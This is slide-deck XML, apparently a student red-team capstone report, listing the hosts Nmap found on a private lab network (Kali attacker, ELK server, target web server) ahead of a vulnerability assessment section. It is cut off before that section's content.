            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>OS: Linux Ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Hostname: elk</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>IPv4:192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Hostname: capstone</a:t>
            </a:r>
            <a:endParaRPr sz="900"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
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>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4" name="Picture 3" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE3ECA6-93C9-85C6-9E96-FAF8B97C810A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="495347" y="1096268"/>
            <a:ext cx="3273089" cy="3361431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D56228D-679B-1D19-4AC5-71507566C80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3837006" y="3803072"/>
            <a:ext cx="2953204" cy="395578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589E105C-1FB9-51A8-18DB-2EB5A55FAC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3856046" y="3020290"/>
            <a:ext cx="2934164" cy="674207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7AEBDC0-142F-00B7-BE31-5CBE9347D2DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3856047" y="1475509"/>
            <a:ext cx="2971637" cy="784023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6565D413-0F77-61E8-A693-09DB16CCDDA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3852958" y="2473037"/>
            <a:ext cx="2939015" cy="47558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pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Google Shape;1065;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6" name="Google Shape;1066;p5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a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="102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a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p5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5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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p5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marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p5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076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93961570"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="436418" y="1198750"/>
          <a:ext cx="8329982" cy="3698020"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{FFF4F696-85C8-45BD-83F6-7E31E192685C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2765582">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="403225">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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hostname: VM-REFVM-684427</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>OS: Windows 10</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hyper-V Server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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Host machine for VM devices</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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79347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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Hostname: Kali</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>192.168.1.90</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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sv-SE" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>OS: Kali Linux Debian 5</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Pentesting Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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79347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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Hostname: elk</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>OS: Linux Ubuntu</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Stack Server</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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r h="79347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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Hostname: capstone</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>192.168.1.105</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>OS: Linux</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Target Machine</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Corporate Web Server</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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83" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250415036"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="472190" y="1201900"/>
          <a:ext cx="8357460" cy="3617436"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{FFF4F696-85C8-45BD-83F6-7E31E192685C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2785820">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2769726">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2801914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="469654">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835534">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
